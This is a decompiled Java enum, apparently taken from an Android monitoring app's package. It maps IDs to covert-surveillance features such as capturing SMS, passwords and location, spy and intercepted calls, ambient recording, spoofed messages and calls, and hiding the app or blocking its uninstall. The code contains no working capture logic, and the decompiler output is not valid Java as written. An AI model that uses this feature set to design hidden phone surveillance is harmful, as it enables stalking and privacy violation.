package com.vvt.base;

import java.util.HashMap;
import java.util.Map;

public enum FeatureId
{
  private static final Map a;
  private final int number;
  
  static
  {
    int i = 4;
    int j = 3;
    int k = 2;
    int m = 1;
    int n = 0;
    Object localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SPECIAL", 0, 0);
    SPECIAL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_CALLLOG", m, m);
    CAPTURE_CALLLOG = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_SMS", k, k);
    CAPTURE_SMS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_EMAIL", j, j);
    CAPTURE_EMAIL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_MMS", i, i);
    CAPTURE_MMS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_WALLPAPER", 5, 5);
    CAPTURE_WALLPAPER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_CAMERAIMAGE", 6, 6);
    CAPTURE_CAMERAIMAGE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_SOUND_RECORDING", 7, 7);
    CAPTURE_SOUND_RECORDING = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_VIDEO_RECORDING", 8, 8);
    CAPTURE_VIDEO_RECORDING = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_LOCATION", 9, 9);
    CAPTURE_LOCATION = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_SYSTEM", 10, 10);
    CAPTURE_SYSTEM = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_CALENDAR", 11, 11);
    CAPTURE_CALENDAR = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_CONTACT", 12, 12);
    CAPTURE_CONTACT = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_IM", 13, 13);
    CAPTURE_IM = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_PIN_MESSAGE", 14, 14);
    CAPTURE_PIN_MESSAGE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_BROWSER_URL", 15, 15);
    CAPTURE_BROWSER_URL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_APPLICATION", 16, 16);
    CAPTURE_APPLICATION = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_HISTORICAL_MEDIA", 17, 17);
    CAPTURE_HISTORICAL_MEDIA = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_SETTINGS", 18, 18);
    CAPTURE_SETTINGS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_VOIP_CALLLOG", 19, 21);
    CAPTURE_VOIP_CALLLOG = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_PASSWORD", 20, 23);
    CAPTURE_PASSWORD = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SIM_CHANGE_NOTIFICATION", 21, 31);
    SIM_CHANGE_NOTIFICATION = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("COMMUNICATION_RESTRICTION", 22, 32);
    COMMUNICATION_RESTRICTION = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("PANIC", 23, 33);
    PANIC = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("ALERT_LOCK", 24, 34);
    ALERT_LOCK = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("AUTO_ANSWER", 25, 35);
    AUTO_ANSWER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("DATA_WIPE", 26, 36);
    DATA_WIPE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SPY_CALL", 27, 37);
    SPY_CALL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CALL_INTERCEPT", 28, 38);
    CALL_INTERCEPT = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CALL_WATCH_NOTIFICATION", 29, 39);
    CALL_WATCH_NOTIFICATION = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SMS_KEYWORD", 30, 40);
    SMS_KEYWORD = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("MONITOR_NUMBER", 31, 41);
    MONITOR_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("EMERGENCY_NUMBER", 32, 42);
    EMERGENCY_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("NOTIFICATION_NUMBER", 33, 43);
    NOTIFICATION_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("HOME_NUMBER", 34, 44);
    HOME_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CIS_NUMBER", 35, 45);
    CIS_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("HIDE_FROM_APP_MANAGER", 36, 46);
    HIDE_FROM_APP_MANAGER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("HIDE_FROM_APP_DRAWER", 37, 47);
    HIDE_FROM_APP_DRAWER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("PREVENT_UNINSTALL", 38, 48);
    PREVENT_UNINSTALL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("APP_PROFILE", 39, 49);
    APP_PROFILE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("URL_PROFILE", 40, 50);
    URL_PROFILE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("ADDRESS_BOOK_MANAGEMENT", 41, 51);
    ADDRESS_BOOK_MANAGEMENT = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SPOOF_SMS", 42, 52);
    SPOOF_SMS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SPOOF_CALL", 43, 53);
    SPOOF_CALL = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SEND_BOOKMARKS", 44, 54);
    SEND_BOOKMARKS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SEND_INSTALLED_APPS", 45, 55);
    SEND_INSTALLED_APPS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SEND_RUNNING_APPS", 46, 56);
    SEND_RUNNING_APPS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("PUSH_NOTIFICATIONS", 47, 57);
    PUSH_NOTIFICATIONS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CAPTURE_CALL_RECORDING", 48, 58);
    CAPTURE_CALL_RECORDING = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("AMBIENT_RECORDING", 49, 59);
    AMBIENT_RECORDING = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("REMOTE_CAMERA_IMAGE", 50, 60);
    REMOTE_CAMERA_IMAGE = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SPY_CALL_ON_FACETIME", 51, 61);
    SPY_CALL_ON_FACETIME = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("SEND_DEVICE_SETTINGS", 52, 62);
    SEND_DEVICE_SETTINGS = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    ((FeatureId)localObject).<init>("CALL_RECORDING_WATCH_NUMBER", 53, 63);
    CALL_RECORDING_WATCH_NUMBER = (FeatureId)localObject;
    localObject = new com/vvt/base/FeatureId;
    int i1 = 54;
    int i2 = 207;
    ((FeatureId)localObject).<init>("CAPTURE_VOIP_CALL_RECORDING", i1, i2);
    CAPTURE_VOIP_CALL_RECORDING = (FeatureId)localObject;
    int i3 = 55;
    localObject = new FeatureId[i3];
    FeatureId localFeatureId1 = SPECIAL;
    localObject[0] = localFeatureId1;
    localFeatureId1 = CAPTURE_CALLLOG;
    localObject[m] = localFeatureId1;
    localFeatureId1 = CAPTURE_SMS;
    localObject[k] = localFeatureId1;
    localFeatureId1 = CAPTURE_EMAIL;
    localObject[j] = localFeatureId1;
    localFeatureId1 = CAPTURE_MMS;
    localObject[i] = localFeatureId1;
    FeatureId localFeatureId2 = CAPTURE_WALLPAPER;
    localObject[5] = localFeatureId2;
    localFeatureId2 = CAPTURE_CAMERAIMAGE;
    localObject[6] = localFeatureId2;
    localFeatureId2 = CAPTURE_SOUND_RECORDING;
    localObject[7] = localFeatureId2;
    localFeatureId2 = CAPTURE_VIDEO_RECORDING;
    localObject[8] = localFeatureId2;
    localFeatureId2 = CAPTURE_LOCATION;
    localObject[9] = localFeatureId2;
    localFeatureId2 = CAPTURE_SYSTEM;
    localObject[10] = localFeatureId2;
    localFeatureId2 = CAPTURE_CALENDAR;
    localObject[11] = localFeatureId2;
    localFeatureId2 = CAPTURE_CONTACT;
    localObject[12] = localFeatureId2;
    localFeatureId2 = CAPTURE_IM;
    localObject[13] = localFeatureId2;
    localFeatureId2 = CAPTURE_PIN_MESSAGE;
    localObject[14] = localFeatureId2;
    localFeatureId2 = CAPTURE_BROWSER_URL;
    localObject[15] = localFeatureId2;
    localFeatureId2 = CAPTURE_APPLICATION;
    localObject[16] = localFeatureId2;
    localFeatureId2 = CAPTURE_HISTORICAL_MEDIA;
    localObject[17] = localFeatureId2;
    localFeatureId2 = CAPTURE_SETTINGS;
    localObject[18] = localFeatureId2;
    localFeatureId2 = CAPTURE_VOIP_CALLLOG;
    localObject[19] = localFeatureId2;
    localFeatureId2 = CAPTURE_PASSWORD;
    localObject[20] = localFeatureId2;
    localFeatureId2 = SIM_CHANGE_NOTIFICATION;
    localObject[21] = localFeatureId2;
    localFeatureId2 = COMMUNICATION_RESTRICTION;
    localObject[22] = localFeatureId2;
    localFeatureId2 = PANIC;
    localObject[23] = localFeatureId2;
    localFeatureId2 = ALERT_LOCK;
    localObject[24] = localFeatureId2;
    localFeatureId2 = AUTO_ANSWER;
    localObject[25] = localFeatureId2;
    localFeatureId2 = DATA_WIPE;
    localObject[26] = localFeatureId2;
    localFeatureId2 = SPY_CALL;
    localObject[27] = localFeatureId2;
    localFeatureId2 = CALL_INTERCEPT;
    localObject[28] = localFeatureId2;
    localFeatureId2 = CALL_WATCH_NOTIFICATION;
    localObject[29] = localFeatureId2;
    localFeatureId2 = SMS_KEYWORD;
    localObject[30] = localFeatureId2;
    localFeatureId2 = MONITOR_NUMBER;
    localObject[31] = localFeatureId2;
    localFeatureId2 = EMERGENCY_NUMBER;
    localObject[32] = localFeatureId2;
    localFeatureId2 = NOTIFICATION_NUMBER;
    localObject[33] = localFeatureId2;
    localFeatureId2 = HOME_NUMBER;
    localObject[34] = localFeatureId2;
    localFeatureId2 = CIS_NUMBER;
    localObject[35] = localFeatureId2;
    localFeatureId2 = HIDE_FROM_APP_MANAGER;
    localObject[36] = localFeatureId2;
    localFeatureId2 = HIDE_FROM_APP_DRAWER;
    localObject[37] = localFeatureId2;
    localFeatureId2 = PREVENT_UNINSTALL;
    localObject[38] = localFeatureId2;
    localFeatureId2 = APP_PROFILE;
    localObject[39] = localFeatureId2;
    localFeatureId2 = URL_PROFILE;
    localObject[40] = localFeatureId2;
    localFeatureId2 = ADDRESS_BOOK_MANAGEMENT;
    localObject[41] = localFeatureId2;
    localFeatureId2 = SPOOF_SMS;
    localObject[42] = localFeatureId2;
    localFeatureId2 = SPOOF_CALL;
    localObject[43] = localFeatureId2;
    localFeatureId2 = SEND_BOOKMARKS;
    localObject[44] = localFeatureId2;
    localFeatureId2 = SEND_INSTALLED_APPS;
    localObject[45] = localFeatureId2;
    localFeatureId2 = SEND_RUNNING_APPS;
    localObject[46] = localFeatureId2;
    localFeatureId2 = PUSH_NOTIFICATIONS;
    localObject[47] = localFeatureId2;
    localFeatureId2 = CAPTURE_CALL_RECORDING;
    localObject[48] = localFeatureId2;
    localFeatureId2 = AMBIENT_RECORDING;
    localObject[49] = localFeatureId2;
    localFeatureId2 = REMOTE_CAMERA_IMAGE;
    localObject[50] = localFeatureId2;
    localFeatureId2 = SPY_CALL_ON_FACETIME;
    localObject[51] = localFeatureId2;
    localFeatureId2 = SEND_DEVICE_SETTINGS;
    localObject[52] = localFeatureId2;
    localFeatureId2 = CALL_RECORDING_WATCH_NUMBER;
    localObject[53] = localFeatureId2;
    localFeatureId2 = CAPTURE_VOIP_CALL_RECORDING;
    localObject[54] = localFeatureId2;
    b = (FeatureId[])localObject;
    localObject = new java/util/HashMap;
    ((HashMap)localObject).<init>();
    a = (Map)localObject;
    localObject = values();
    int i4 = localObject.length;
    while (n < i4)
    {
      localFeatureId2 = localObject[n];
      Map localMap = a;
      m = localFeatureId2.number;
      Integer localInteger = Integer.valueOf(m);
      localMap.put(localInteger, localFeatureId2);
      n += 1;
    }
  }
  
  private FeatureId(int paramInt1)
  {
    this.number = paramInt1;
  }
  
  public static FeatureId forValue(int paramInt)
  {
    Map localMap = a;
    Integer localInteger = Integer.valueOf(paramInt);
    return (FeatureId)localMap.get(localInteger);
  }
  
  public int getNumber()
  {
    return this.number;
  }
}


/* Location:              /Volumes/D1/codebase/android/POC/assets/product/maind/classes-enjarify.jar!/com/vvt/base/FeatureId.class
 * Java compiler version: 5 (49.0)
 * JD-Core Version:       0.7.1
 */